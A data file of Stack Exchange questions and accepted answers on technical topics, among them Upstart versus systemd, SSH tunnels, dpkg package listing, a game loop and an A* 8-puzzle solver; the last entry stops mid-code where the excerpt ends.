id
stringlengths 5
27
| question
stringlengths 19
69.9k
| title
stringlengths 1
150
| tags
stringlengths 1
118
| accepted_answer
stringlengths 4
29.9k
⌀ |
---|---|---|---|---|
_webapps.79388 | If you add descriptions to images in Google Drive and then download those images, the descriptions are not attached anywhere in the image properties/metadata. Is there a way prevent this or are the descriptions stored externally to the image, as opposed to as metadata (IPTC, XMP, EXIF)? | Images downloaded from Google Drive lose their description | google drive | Google Drive user interface doesn't have a built-in way to view or edit IPTC, XMP, EXIF metadata. As far as I know, Drive SDK has method to get the image metadata but not to change it.ReferencesDrive HelpFiles - Drive REST API |
_unix.6007 | This might sound crazy, but bear with me ;)I am making a DIY camera trigger, and I would like to see if I can trigger it remotely by plugging it into my Microphone or Headphone ports. It's a basic 2.5 mm --> 3.5 mm plug, and all I need to do is short the first and last, first and second, and all three to focus, trigger, and focus and trigger.It's a bit hard to explain, but is it possible to send electrical signals directly through those ports? I'm up to some C++ or Python (heh) if I have to... | Linux: Interface/control 3.5 mm Headphone or Microphone port? | hardware;camera | You can use the audio port to create a time-varied differential voltage signal. You can't short the contacts together, though. In fact, you might even damage the dac in your computer if you connected it since doing that would force the dac outputs to whatever voltage level the hotshoe is.If you really want to do this, you might want to use a USB gpio board (like this one) and make a circuit that shorts your contacts. The folks at Chiphacker (aka Electronics & Robotics) would be able to help you with any questions about that. |
_unix.5877 | It appears systemd is the hot new init system on the block, same as Upstart was a few years ago. What are the pros/cons for each? Also, how does each compare to other init systems? | What are the pros/cons of Upstart and systemd? | init;upstart;systemd | 2016 UpdateMost answers here are five years old so it's time for some updates.Ubuntu used to use upstart by default but they abandoned it last year in favor of systemd - see:Grab your pitchforks: Ubuntu to switch to systemd on Monday (The Register)Because of that there is a nice article Systemd for Upstart Users on Ubuntu wiki - very detailed comparison between upstart and systemd and a transition guide from upstart to systemd.(Note that according to the Ubuntu wiki you can still run upstart on current versions of Ubuntu by default by installing the upstart-sysv and running sudo update-initramfs -u but considering the scope of the systemd project I don't know how it works in practice, or whether or not systemd is possible to uninstall.)Most of the info in the Commands and Scripts sections below is adapted from some of the examples used in that article (that is conveniently licensed just like Stack Exchange user contributions under the Creative Commons Attribution-ShareAlike 3.0 License).Here is a quick comparison of common commands and simple scripts, see sections below for detailed explanation. This answer is comparing the old behavior of Upstart-based systems with the new behavior of systemd-based systems, as asked in the question, but note that the commands tagged as Upstart are not necessarily Upstart-specific - they are often commands that are common to every non-systemd Linux and Unix system. CommandsRunning su:upstart: susystemd: machinectl shell(see su command replacement section below)Running screen:upstart: screensystemd: systemd-run --user --scope screen(see Unexpected killing of background processes section below)Running tmux:upstart: tmuxsystemd: systemd-run --user --scope tmux(see Unexpected killing of background processes section below)Starting job foo:upstart: start foosystemd: systemctl start fooStopping job foo:upstart: stop foosystemd: systemctl stop fooRestarting job foo:upstart: restart foosystemd: systemctl restart fooListing jobs:upstart: initctl listsystemd: systemctl statusChecking configuration of job foo:upstart: init-checkconf /etc/init/foo.confsystemd: systemd-analyze verify /lib/systemd/system/foo.serviceListing job's environement variables:upstart: initctl list-envsystemd: systemctl show-environmentSetting job's environment variable:upstart: initctl set-env foo=barsystemd: systemctl set-environment foo=barRemoving job's environment variable:upstart: initctl unset-env foosystemd: systemctl unset-environment fooLogsIn upstart, the logs are normal text files in the /var/log/upstart directory, so you can process them as usual:cat /var/log/upstart/foo.logtail -f /var/log/upstart/foo.logIn systemd logs are stored in an internal binary format (not as text files) so you need to use journalctl command to access them:sudo journalctl -u foosudo journalctl -u foo -fScriptsExample upstart script written in /etc/init/foo.conf:description Job that runs the foo daemonstart on runlevel [2345]stop on runlevel [016]env statedir=/var/cache/foopre-start exec mkdir -p $statedirexec /usr/bin/foo-daemon --arg1 hello world --statedir $statedirExample systemd script written in /lib/systemd/system/foo.service:[Unit]Description=Job that runs the foo daemonDocumentation=man:foo(1)[Service]Type=forkingEnvironment=statedir=/var/cache/fooExecStartPre=/usr/bin/mkdir -p ${statedir}ExecStart=/usr/bin/foo-daemon --arg1 hello world --statedir ${statedir}[Install]WantedBy=multi-user.targetsu command replacementA su command replacement was merged into systemd in pull request #1022:Add new machinectl shell command for su(1)-like behaviourbecause, according to Lennart Poettering, su is really a broken concept.He explains that you can use su and sudo as before, but don't expect that it will work in full.The official way to achieve a su-like behavior is now:machinectl shellIt has been furtherexplained by Lennart Poetteringin the discussion to issue #825:Well, there have been long discussions about this, but the problem is that what su is supposed to do is very unclear. [...] Long story short: su is really a broken concept. It will given you kind of a shell, and its fine to use it for that, but its not a full login, and shouldnt be mistaken for one. - Lennart PoetteringSee also:Lennart Poettering merged su command replacement into systemd: Test Drive on Fedora RawhideSystemd Absorbs su Command FunctionalitySystemd Absorbs su (Hacker News)Unexpected killing of background processesCommands like:screentmuxnohupno longer work as expected. For example, nohup is a POSIX command to make sure that the process keeps running after you log out from your session. It no longer works on systemd. Also programs like screen and tmux need to be invoked in a special way or otherwise the processes that you run with them will get killed (while not getting those processes killed is usually the main reason of running screen or tmux in the first place).This is not a mistake, it is a deliberate decision, so it is not likely to get fixed in the future. This is what Lennart Poettering has said about this issue:In my view it was actually quite strange of UNIX that it by default let arbitrary user code stay around unrestricted after logout. It has been discussed for ages now among many OS people, that this should possible but certainly not be the default, but nobody dared so far to flip the switch to turn it from a default to an option. Not cleaning up user sessions after logout is not only ugly and somewhat hackish but also a security problem. systemd 230 now finally flipped the switch and finally by default cleans everything up correctly when the user logs out.For more info see:Systemd Starts Killing Your Background Processes By DefaultSystemd v230 kills background processes after user logs out, breaks screen, tmuxDebian Bug #825394: systemd kill background processes after user logs outHigh-level startup conceptIn a way systemd works backwards - in upstart jobs start as soon as they can and in systemd jobs start when they have to. At the end of the day the same jobs can be started by both systems and in pretty much the same order, but you think about it looking from an opposite direction so to speak.Here is how Systemd for Upstart Users explains it:Upstart's model for starting processes (jobs) is greedy event-based, i. e. all available jobs whose startup events happen are started as early as possible. During boot, upstart synthesizes some initial events like startup or rcS as the tree root, the early services start on those, and later services start when the former are running. A new job merely needs to install its configuration file into /etc/init/ to become active.systemd's model for starting processes (units) is lazy dependency-based, i. e. a unit will only start if and when some other starting unit depends on it. During boot, systemd starts a root unit (default.target, can be overridden in grub), which then transitively expands and starts its dependencies. A new unit needs to add itself as a dependency of a unit of the boot sequence (commonly multi-user.target) in order to become active.Usage in distributionsNow some recent data according to Wikipedia:Distributions using upstart by default:Ubuntu (from 9.10 to 14.10)Chrome OSChromium OSDistributions using systemd by default:Arch Linux - since October 2012CentOS - since April 2014 (7.14.04)CoreOS - sice October 2013 (v94.0.0)Debian - since April 2015 (v8)Fedora - since May 2011 (v15)Mageia - since May 2012 (v2.0)openSUSE - since September 2012 (v12.2)Red Hat Enterprise Linux - since June 2014 (v7.0)SUSE Linux Enterprise Server - since October 2014 (v12)Ubuntu - since April 2015 (v15.04)(See Wikipedia for up to date info)Distributions using neither Upstart nor systemd:Devuan (Debian fork created that resulted from the systemd controversies in the Debian community that led to a resignation of Ian Jackson) - specifically promotes Init Freedom with the following init systems considered for inclusion: sinit, OpenRC, runit, s6 and shepherd.Void Linux - uses runit as the init system and service supervisorGentoo - uses OpenRCOS X - uses launchdFreeBSD uses a a traditional BSD-style init (not SysV init)NetBSD uses rc.dDragonFly uses traditional initOpenBSD uses the rc system startup script described hereAlpine Linux (relatively new and little known distribution, with strong emphasis on security is getting more popular - e.g. Docker is moving its official images from Ubuntu to Alpine) uses the OpenRC init system ControversyIn the past A fork of Debian has been proposed to avoid systemd. The Devuan GNU+Linux was created - a fork of Debian without systemd (thanks to fpmurphy1 for pointing it out in the comments).For more info about this controversy, see:The official Debian position on systemdThe systemd controversyDebian Exodus declaration in 2014:As many of you might know already, the Init GR Debian vote promoted by Ian Jackson wasn't useful to protect Debian's legacy and its users from the systemd avalanche.This situation prospects a lock in systemd dependencies which is de-facto threatening freedom of development and has serious consequences for Debian, its upstream and its downstream.The CTTE managed to swap a dependency and gain us time over a subtle install of systemd over sysvinit, but even this process was exhausting and full of drama. Ultimately, a week ago, Ian Jackson resigned. [...]Ian Jackson's resignation:I am resigning from the Technical Committee with immediate effect.While it is important that the views of the 30-40% of the project who agree with me should continue to be represented on the TC, I myself am clearly too controversial a figure at this point to do so. I should step aside to try to reduce the extent to which conversations about the project's governance are personalised. [...]The Init Freedom:Devuan was born out of a controversy over the decision to use as the default init system for Debian. The official Debian position on systemd is full of claims that others have debunked. Interested readers can continue discussing this hot topic in The systemd controversy. However we encourage you to keep your head cool and your voice civil. At Devuan were more interested in programming them wrong than looking back. [...]Some websites and articles dedicated to the systemd controversy has been created:Without-Systemd.orgSystemd-Free.org The Init FreedomSystemd on SucklessThere is a lot of interesting discussion on Hacker News:https://news.ycombinator.com/item?id=7728692https://news.ycombinator.com/item?id=13387845https://news.ycombinator.com/item?id=11797075https://news.ycombinator.com/item?id=12600413https://news.ycombinator.com/item?id=11845051https://news.ycombinator.com/item?id=11782364https://news.ycombinator.com/item?id=12877378https://news.ycombinator.com/item?id=10483780https://news.ycombinator.com/item?id=13469935Similar tendencies in other distros can be observed as well:The Church of Suckless NixOS is looking for followersPhilosophyupstart follows the Unix philosophy of DOTADIW - Do One Thing and Do It Well. It is a replacement for the traditional init daemon. It doesn't do anything other than starting and stopping services. Other tasks are delegated to other specialized subsystems.systemd does much more than that. In addition to starting and stopping services it also manages passwords, logins, terminals, power management, factory resets, log processing, file system mount points, networking and much more - see the NEWS file for some of the features.Plans of expansionAccording to A Perspective for systemdWhat Has Been Achieved, and What Lies Ahead presentation by Lennart Poettering in 2014 at GNOME.asia, here are the main objectives of systemd, areas that were already covered and those that were still in progress:systemd objectives:Our objectivesTurning Linux from a bag of bits into a competitive General Purpose Operating System.Building the Internets Next Generation OS Unifying pointless differences between distributionsBringing innovation back to the core OSDesktop, Server, Container, Embedded, Mobile, Cloud, Cluster, . . . These areas are closer together than you might thinkReducing administrator complexity, reliability without supervisionEverything introspectableAuto discovery, plug and play is keyWe fix things where they are broken, never tape over themAreas already covered:What we already cover:init system, journal logging, login management, device management, temporary and volatile file management, binary format registration, backlight save/restore, rfkill save/restore, bootchart, readahead, encrypted storage setup, EFI/GPT partition discovery, virtual machine/container registration, minimal container management, hostname management, locale management, time management, random seed management, sysctl variable management, console managment, . . .Work in progress:What we are working on:network managementsystemd-networkdLocal DNS cache, mDNS responder, LLMNR responder, DNSSEC verificationIPC in the kernelkdbus, sd-busTime synchronisation with NTPsystemd-timesyncdMore integration with containersSandboxing of ServicesSandboxing of AppsOS Image formatContainer image formatApp image formatGPT with auto-discoveryStateless systems, instantiatable systems, factory reset/usr is the OS/etc is (optional) configuration/var is (optional) stateAtomic node initialisation and updatesIntegration with the cloudService management across nodesVerifiable OS imagesAll the way to the firmwareBoot LoadingScope of this answerAs fpmurphy1 noted in the comments, It should be pointed out that systemd has expanded its scope of work over the years far beyond simply that of system startup.I tried to include most of the relevant info here. Here I am comparing the common features of Upstart and systemd when used as init systems as asked in the question and I only mention features of systemd that go beyond the scope of an init system because those cannot be compared to Startup, but their presence is important to understand the difference between those two projects. The relevant documentation should be checked for more info.More infoMore info can be found at:upstart websitesystemd websiteUpstart on WikipediaSystemd on WikipediaThe architecture of systemd on WikipediaLinus Torvalds and others on Linux's systemd (ZDNet)About the systemd controversy by Robert GrahamInit Freedom CampaignRationale for switching from upstart to systemd?ExtrasThe LinOxide Team has created a Systemd vs SysV Init Linux Cheatsheet. |
_unix.328549 | I like to rip my vhs on mpeg formatI use a vcr svhs and this mencoder linemencoder -tv driver=v4l2:alsa:adevice=hw.0,0:amode=1:audiorate=32000:forceaudio:immediatemode=0:freq=189.250:device=/dev/video0:input=3:norm=PAL:width=720:height=576:outfmt=yuy2 tv:// -oac lavc -ovc lavc -of mpeg -mpegopts format=dvd -vf pp=lb/ha/va/dr,hqdn3d,harddup -srate 48000 -af lavcresample=48000 -lavcopts vcodec=mpeg2video:vrc_buf_size=1500:vrc_maxrate=8000:vbitrate=7000:keyint=15:acodec=mp2:abitrate=192:aspect=4/3 -o video.mpgThe rip is ok,audio in sync but i see very annoyng green framesand actors seems aliens.There is a way to avoid green frames? | Linux mencoder and green frames | mencoder | null |
_unix.255402 | A proxy server was added using export http://link:port/.I try to ping google.com and there is no response, the DNS is able to resolve an IP. wget of google.com works.routes:Destination Gateway Genmask Flags Metric Ref Use Iface192.168.123.0 * 255.255.255.0 U 0 0 0 eth0link-local * 255.255.0.0 U 1002 0 0 eth0default 192.168.123.1 0.0.0.0 UG 0 0 0 eth0ip tables::INPUT ACCEPT [0:0]:FORWARD ACCEPT [0:0]:OUTPUT ACCEPT [21:2344]-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT-A INPUT -p icmp -j ACCEPT-A INPUT -i lo -j ACCEPT-A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT-A INPUT -j REJECT --reject-with icmp-host-prohibited-A FORWARD -j REJECT --reject-with icmp-host-prohibitedany ideas? | Linux server able to wget but not able to ping | networking;wget;ping | null |
_unix.205321 | I want to enable bluetooth device when system is up.Which is the recommended way to do it?The command is sudo hciconfig hci0 up.Should I put it in /etc/rc.local? or should I use update-rc.d?If there is no proper way to do it, I'll choose the way with /etc/rc.local.Thanks.EditFollowing @krt's answer I added @reboot cronjob, but hci0 are still down when rebooting. According to /var/log/syslog the job is running correctly.1136 May 24 11:17:20 klein /usr/sbin/cron[2107]: (CRON) INFO (pidfile fd = 3)1137 May 24 11:17:20 klein /usr/sbin/cron[2108]: (CRON) STARTUP (fork ok)1138 May 24 11:17:20 klein /usr/sbin/cron[2108]: (CRON) INFO (Running @reboot jobs) | Where should I put `hciconfig hci0 up` for start up | raspberry pi | null |
_codereview.124595 | I'm writing a Direct2D game in c++ / WinAPI. I need to render things 60 times every a second using fixed time step.__int64 time_before = 0;__int64 time_now;__int64 frequency;__int64 time_elapsed;double frameTime;if (QueryPerformanceFrequency((LARGE_INTEGER*)&frequency)) { frameTime = (double)frequency / 60; while (true) { //process incoming messages here QueryPerformanceCounter((LARGE_INTEGER*)&time_now); time_elapsed = time_now - time_before; if (time_elapsed >= frameTime) { //update and render things here: time_start = time_before; } }}Are there any problems, or are there any improvements that can be made? | Fixed time step game loop | c++;game;winapi | null |
_unix.64991 | CentOS 6I'm studying RHEL / Centos and recently learned that the touch command can be used to change the last access date of a file. I'm struggling to understand a practical reason why anyone would want to do this (without actually making any changes to a file). Can someone please elaborate? | Why would someone want to change the last access date of a file without making actual changes within the file itself? | bash;centos;rhel | null |
_unix.230792 | This thread comes from here. Even when it is an Android question,I think the theoretical command line part should better be asked here.In short: I have achieved to mount a Ext4 file system, but this mount only exists for root user.Details:root@unknown:/ # mount | grep sdcard -i/dev/block/mmcblk1p1 /storage/sdcard1 ext4 rw,seclabel,relatime,data=ordered 0 0root@unknown:/ # exitu0_a98@unknown:/ $ mount | grep sdcardu0_a98@unknown:/ $ mount | grep mmcblkAs can be seen, the normal user can not see the device as mounted. This is, obviously, very different from having no permissions to access it.This could be some sort of bug, by the way.Or is it possible to do this on Linux? | Is it possible to mount a partition only for some users? | filesystems;mount | null |
_softwareengineering.152566 | I am wondering if there are any studies that examine the efficacy of software projects in CMMI-oriented organizations. For example, are CMMI organizations more likely to finish projects on time and/or on budget than non-CMMI organizations?Edit for clarification:CMMI stands for Capability Maturity Model Integration. It's developed by the Software Engineering Institute at Carnegie-Mellon University (SEI-CMU).It's not a certification, but there are various companies that will appraise your organization to various levels of CMMI, such as level 2 and level 3. (I believe CMMI level 1 is an animalistic, Hobbesian free-for-all that nobody aspires to. In other words, everybody is at least CMMI level 1, even if you've never heard of CMMI before.)I'm definitely not an expert, but I believe that an organization can be appraised for CMMI levels within different scopes of work: i.e. service delivery, software development, foobaring, etc. My question is focused on the software development appraisal: is an organization that has been appraised to CMMI Level X for software projects more likely to finish a software project on time and on budget than another organization that has not been appraised to CMMI Level X?However, in the absence of hard data about software-oriented CMMI, I'd be interested in the effect that CMMI appraisals have on other activities as well.I originally asked the question because I've seen various studies conducted on software (e.g. the essays in The Mythical Man Month refer to numerous empirical studies, as does McConnell's Code Complete), so I know that there are organizations performing empirical studies of software development. | Any empirical evidence on the efficacy of CMMI? | development process;cmmi | null |
_unix.202653 | Is it possible to generate file content based on file name?I need a lot of similar .conf files with content depending on file name only.Can I create some dynamic file and generate a bunch of symlinks pointing to this file?Maybe fifo is a solution, but I can't get the file name in generating script:zsh$ mkfifo ./dynamic.confzsh$ ln -s ./dynamic.conf ./case1.confzsh$ echo $0 > ./dynamic.conf & zsh$ cat ./case1.confI have zsh (I need case1.conf). | Is it possible to create dynamic content on file read operation? | linux;files;pipe | Totally different approach because I just know your eyes are rolling at that last answer.In this one, you're going to rely on inotify which means it's really Linux-specific. You're going to turn the problem on its head -- the individual configuration files will still be there, but you will re-generate them automagically each time there is a change to the master. You have your master configuration file, say master.conf, that contains all your sections, sub-sections, etc. You set up your script with inotify so that when that script is changed, it will re-write all those files. (To avoid a race condition, you might have to do some extra tricks, like storing the files in a sub-directory, and swapping directories to perform your commit.)From https://stackoverflow.com/q/5316178/3849157 we get a basic perl script:my $inotify = Linux::Inotify2->new;$inotify->watch(/etc/master.conf, IN_MODIFY);while () { my @events = $inotify->read; unless (@events > 0){ print read error: $!; last ; } foreach my $event (@events) { next unless $event->IN_MODIFY; # 1. TODO: RE-READ IN THE CONFIG FILE # (example) $config_hash = &parse_master_file; # 2. TODO: RE-GENERATE YOUR CONFIG FILES # (example) for $section qw( section1 section2 misc ) { open(S,> /etc/${section}.conf) print S &dump_config($config_hash,$section) close(S) } }}Doing the parse_master_file and dump_config will be up to you. Also, there probably should be a call to sleep in the main loop or your CPU will catch on fire. |
_cs.65279 | While studying, I came across the following statements:A join point is a program point where two branches meet.Available expressions is a forward, must problem.Forward = Data Flow from in to out.Must = At joint point, property must hold on all paths that are joined.I get what joint point, available expression and forward is. But I am getting what exactly is meant by MUST.Someone please explain what MUST is with example.Edit: Could you please relate your statement with the following example. | Forward must problem explanation in compiler design | compilers | null |
_unix.339363 | How can I send characters to a command as though they came from a file?For example I tried:wc < apple pear orange-bash: apple pear orange: No such file or directory | How can I send characters to a command as though they came from a file? | shell | null |
_softwareengineering.271471 | When using the Switch statement, is using return instead of break or a combination of the two considered bad form?while (true){ var operation = Randomness.Next(0, 3); switch (operation) { case 0: return result + number; case 1: if ((result - number) > 0) { return result - number; } break; case 2: return result * number; case 3: if ((result % number) == 0) { return result / number; } break; }} | Using Return over Break or a combination | c#;switch statement | The break statement is required in case 1 and case 3. If you omit it, the code will not compile, because the if body is not guaranteed to execute, and fall-through in switch statements is not allowed in C#.The break statement is not required in case 0 and case 2, because the return always executes; code execution will never reach the break statement. The compiler will issue a warning if you include the break statement, but the code will compile.Not having break statements can be useful in simplifying certain mapping or factory functions:public string NumericString(int digit){ switch (digit) { case 1: return one; case 2: return two; case 3: return three; // ..etc. }}If you need fall-through behavior, you can simulate it with a goto, one of the few places in the C# language where using a goto actually makes sense, though it's arguable whether or not that constitutes good style. |
_webmaster.81019 | Ive been getting an awful lot of refer spam in my Google Analytics referrer traffic recently (as i guess most people are - sites like www.Get-Free-Traffic-Now.com, buttons-for-your-website.com etc)Is there a way to stop this ? Is there a different tracking code that i could use or is there a way i can remove / ignore certain sites from the referral report ? | Stop Google Analytics refere spam | google analytics;referrer | null |
_softwareengineering.90903 | As most projects use a C++ API, they deal with constraints of the API and constraints of the project itself.I'm a beginner at programming, I don't like to use OOP at all because nobody clearly managed to explain to me WHY it's is so important to restricting yourself with private scope to prevent others programmers to break data organisation consistency of some kind.I still can be ok with OOP, since it still allows to make some great things like Qt and Ogre3D, but those are only APIs, not applications, and those codes need to be perfect so nobody can criticize the work.I don't understand why do most programmers, since they make apps and not APIs, want to do perfect code like they design some genius piece of code, and waste time on this. | What is beautiful code in C++, and why do most programmers care that much? | c++;code quality;language agnostic | Have you ever heard the saying No man is an island?For most programmers this is true. Hardly anyone writes code that is just an app. On many non-trivial apps one programmer writes the UI which needs to be easily modified by a designer. It also must allow for clear data binding to the business logic (Controller, ViewModel, or whatever you want to call it). Another programmer writes that controller, which can often be extremely complex, but needs to be simple enough to be easily consumed by the front end programmer. That business logic coder is consuming code from whoever wrote the data layer (Model, Repository, etc.). You do not have to use OOP, however, what OOP is pretty good at is allowing you to encapsulate logic behind an interface so that other people you work with can use your code without breaking it (assuming you tested that interface!). Abstraction is not the silver bullet, but you certainly enjoy it when you use libraries like Ogre3d, that allow you to do things you would be very unlikely to accomplish entirely on your own. So you might be saying now Seriously, I'm an exception and no one will see my code or work with it at all. Fair enough, but when you need to fix a bug in that app a few months from now, or want to add a couple features, you will probably see that the person who wrote that code back then and the person who is modifying it now are two totally different people. We often assume we will remember things, which is at the core of why we write sloppy code, but the truth is that yourself six months from now will not remember the hacks you put into your application now. Your future self will have enough to deal with, so why not give him/her a break? |
_webmaster.21976 | Possible Duplicate:What are the best ways to increase your site's position in Google?Move subdomain into subdirectory SEO question This is my first post on here as I am mainly on Stackoverflow and Serverfault. I have been programming for at least 10 years now, have made hundreds of websites but I have just recently started getting into Design and the SEO side of sites, sad that I have been overlooking these for so many years. I have pretty good knowledge from all my years of SEO but I have never really looked into it until now.My question, I would like to build a site that targets many different key words for the search engines, for an example. Let's say I built a site about Outdoor activities called outdoorreview.com and I planned on having many sectionshunting fishing Hiking camping cycling climbing etc...For best Search Engine results, how could I get the most search engine traffic to all these ares?Also how should I structure the way to get to them, outdoorreview.com/Hiking/ or hiking.outdoorreview.com ? | Question about SEO and Domains | seo | null |
_cs.67176 | I'm trying to implement an rbfs search algorithm for the 15 puzzle (pseudo code below).link to the paper where i found the pseudo code:https://www.aaai.org/ocs/index.php/SOCS/SOCS15/paper/viewFile/10911/10632I do not understand what line 11 is suppose to do.Any clue appreciatedAlso, it start with a bound, and in the recursive call, use (min, B, f(n2))Does this mean that you start with infinity in the first call to rbfs as the bound?And so, the bound can only decrease, and never increase ? RBFS(n, B)1. if n is a goal2. solution n; exit()3. C expand(n)4. if C is empty, return 5. for each child ni in C6. if f(n) < F(n) then F(ni) max(F(n), f(ni))7. else F(ni) f(ni)8. (n1, n2) bestF(C)9. while (F(n1) B and F(n1) < )10. F(n1) RBFS(n1, min(B, F(n2)))11. (n1, n2) bestF(C)12. return F(n1)And here is another pseudo-code implementationRBFS (node: N, value: F(N), bound: B) IF f(N)>B, return f(N)IF N is a goal, EXIT algorithmIF N has no children, RETURN infinityFOR each child Ni of N, IF f(N)<F(N) THEN F[i] := MAX(F(N),f(Ni)) ELSE F[i] := f(Ni)sort Ni and F[i] in increasing order of F[i]IF only one child, F[2] := infinityWHILE (F[I] <= B and F[I] < infinity) F[I] := RBFS(NI, F[I], MIN(B, F[2])) insert N1 and F[I] in sorted orderreturn F[I]What I don't understand here is this : insert N1 and f[I] in sorted orderDoes this mean that rbfs does not maintain an open list (since it uses the recursion stack) but it does keep a closed list? | Trouble implementing back-tracking in RBFS | algorithms;shortest path | null |
_unix.210228 | I want to add a user to Red Hat Linux that will not use a password for logging in, but instead use a public key for ssh. This would be on the command line. | Add a user wthout password but with SSH and public key | ssh;password;authentication;useradd | null |
_softwareengineering.284036 | I'm modeling a college process, in which I have three classes: Student, Subject and DegreeDegrees have their own subjects, students have a list of subjects they have passed, and also students should belong to a single degree plan.From a design perspective, how should I associate a student with his/her degree?If student has a reference to his relevant Degree object, then it suddenly could have a lot more responsibility, and I want to manage Separation of concerns properly.Is there a better alternative? | How wrong it is to have multiple associations between classes? | design;object oriented;language agnostic;class design | null |
_reverseengineering.11476 | I start by saying that I'm completely new to the topic of reversing although I have many years of experience with programming in general.I've some problems with automatic recognition of library functions of a DOS executable compiled with Borland C++ 3.1.Actually the signatures are correctly identified as bc31rtd (and it states 199 as the actual number of applied signatures). So for example strcmp is correctly identified, colored and such.Starting from this I was relying blindly on these library function in the rest of the code until I realized that there was something wrong, this is, for example what I see in for strcpy:Which doesn't make sense to me since src is not used at all. Then repne scasb should scan for the length of the string but the last value placed in di is [bp+dest+2] like if both const char* were not dd but dw (so just the offset, without any specified segment, and ds is used implicitly). Since this was getting me crazy I checked the original implementation of the function by opening CC.LIB of BC++3.1 with IDA Pro directly and implementation is different indeed:So where's the problem here?How can I alter the function as I want? I tried modifying directly stack variables (Ctrl+K) but then offsets become faulty (eg [bp+8] marked as red).I ask sorry if I'm making some trivial wrong assumption that I'm not realizing. | IDA Pro and recognized library functions | ida;dos;flirt signatures | null |
_unix.164981 | My Raspberry running Raspbian crashed but I would like to know which packages I had installed on that SD card. Is there a way to detect that without actually booting the system? | List installed packages only from disk image | debian;apt;package management | Debian's package databases are under /var/lib/dpkg. They're text files, fairly easy to parse manually even if you don't have Debian tools around. In particular, the file /var/lib/dpkg/status contains one paragraph of information for every package (not just installed packages but also some other packages known to the system), starting with Package: PACKAGENAME.cd /media/sdcard0/var/lib/dpkg<status awk -v RS= '/\nStatus: install ok installed\n/ {print $2}'If you aren't on unix or other system with awk or other text processing tool, you can inspect the directory /var/lib/dpkg/info. Every package except for virtual dependency-only packages has several files there, including at least PACKAGENAME.list.If you're on a system with dpkg, you can tell it to consult a database other than the normal one.dpkg --admindir=/media/sdcard0/var/lib/dpkg -ldpkg --root=/media/sdcard0 -l |
_softwareengineering.253910 | I got lost in the opening of this post on reddit.How can if (sscanf(buf, %i, &mode) != 1 || TRUE) be rewritten to if (TRUE)? Does this assume that the sscanf never fails? | How can if (sscanf(buf, %i, &mode) != 1 || TRUE) be rewritten to if (TRUE)? | programming practices;coding style | The author of the code calls sscanf and then ignores its return value assuming it is true. You can replace the code with 'if (TRUE)' provided that you call sscanf first. |
_webmaster.102638 | 1 person will send an email to 20 participants. Each participant will reply-all to the message - and continue to do so for each response they receive.Will this improve our email reputations? What about our email reputations with gmail users / outlook users? (assuming that some of the 20 participants are gmail or outlook users) | Will a Reply-All email thread with 20 participants improve our email reputations? | email | null |
_unix.100859 | I have to set up a tunnel between two hosts.For this I use ssh in this way:ssh -L MY_LOCAL_PORT:FOREIGN_ADDRESS:FOREIGN_PORT MYUSER@SSH_SERVERafter that, I log in to my SSH_SERVER.How can I avoid this feature?!I have only to set up a tunnel. I don't have to login into my SSH_SERVER...I've tried the -N option, but it kept my shell busy. | SSH: tunnel without shell on ssh server | ssh;ssh tunneling | As said in other posts, if you don't want a prompt on the remote host, you must use the -N option of SSH. But this just keeps SSH running without having a prompt, and the shell busy.You just need to put the SSH'ing as a background task with the & sign :ssh -N -L 8080:ww.xx.yy.zz:80 user@server &This will launch the ssh tunnelling in the background. But some messages may appear, especially when you try to connect to a non-listening port (if you server apache is not launched). To avoid these messages to spawn in your shell while doing other stuff, you may redirect STDOUT/STDERR to the big void : ssh -N -L 8080:ww.xx.yy.zz:80 user@server >/dev/null 2>&1 & Have fun with SSH. |
_codereview.110429 | I have developed this 8-puzzle solver using A* with manhattan distance. Appreciate if you can help/guide me regarding:1. Improving the readability and optimization of the code.2. I am using sort to arrange the priority queue after each state exploration to find the most promising state to explore next. Any way to optimize it. import numpy as npfrom copy import deepcopyimport datetime as dtimport sys# calculate Manhattan distance for each digit as per goaldef mhd(s, g): m = abs(s // 3 - g // 3) + abs(s % 3 - g % 3) return sum(m[1:])# assign each digit the coordinate to calculate Manhattan distancedef coor(s): c = np.array(range(9)) for x, y in enumerate(s): c[y] = x return c# checking if the initial state is solvable via inversion calculationdef inversions(s): k = s[s != 0] tinv = 0 for i in range(len(k) - 1): b = np.array(np.where(k[i+1:] < k[i])).reshape(-1) tinv += len(b) return tinv# check user input for correctnessdef all(s): set = '012345678' return 0 not in [c in s for c in set]# generate board list as per optimized steps in sequencedef genoptimal(state): optimal = np.array([], int).reshape(-1, 9) last = len(state) - 1 while last != -1: optimal = np.insert(optimal, 0, state[last]['board'], 0) last = int(state[last]['parent']) return optimal.reshape(-1, 3, 3)# solve the boarddef solve(board, goal): # moves = np.array( [ ('u', [0, 1, 2], -3), ('d', [6, 7, 8], 3), ('l', [0, 3, 6], -1), ('r', [2, 5, 8], 1) ], dtype= [ ('move', str, 1), ('pos', list), ('delta', int) ] ) dtstate = [ ('board', list), ('parent', int), ('gn', int), ('hn', int) ] goalc = coor(goal) # initial state values parent = -1 gn = 0 hn = mhd(coor(board), goalc) state = np.array([(board, parent, gn, hn)], dtstate) #priority queue initialization dtpriority = [ ('pos', int), ('fn', int) ] priority = np.array( [(0, hn)], dtpriority) # while True: priority = np.sort(priority, kind='mergesort', order=['fn', 'pos']) # sort priority queue pos, fn = priority[0] # pick out first from sorted to explore priority = np.delete(priority, 0, 0) # remove from queue what we are exploring board, parent, gn, hn = state[pos] board = np.array(board) loc = int(np.where(board == 0)[0]) # locate '0' (blank) gn = gn + 1 # increase cost g(n) by 1 for m in moves: if loc not in m['pos']: succ = deepcopy(board) # generate new state as copy of current succ[loc], succ[loc + m['delta']] = succ[loc + m['delta']], succ[loc] # do the move if ~(np.all(list(state['board']) == succ, 1)).any(): # check if new (not repeat) hn = mhd(coor(succ), goalc) # calculate Manhattan distance q = np.array( [(succ, pos, gn, hn)], dtstate) # generate and add new state in the list state = np.append(state, q, 0) fn = gn + hn # calculate f(n) q = np.array([(len(state) - 1, fn)], dtpriority) # add to priority queue priority = np.append(priority, q, 0) if np.array_equal(succ, goal): # is this goal state? print('Goal achieved!') return state, len(priority) return state, len(priority)#################################################def main(): print() goal = np.array( [1, 2, 3, 4, 5, 6, 7, 8, 0] ) string = input('Enter board: ') if len(string) != 9 or all(string) == 0: print('incorrect input') return board = np.array(list(map(int, string))) if (inversions(board) % 2 != 0): print('not solvable') return state, explored = solve(board, goal) print() print('Total generated:', len(state)) print('Total explored: ', len(state) - explored) print() # generate and show optimized steps optimal = genoptimal(state) print('Total optimized steps:', len(optimal) - 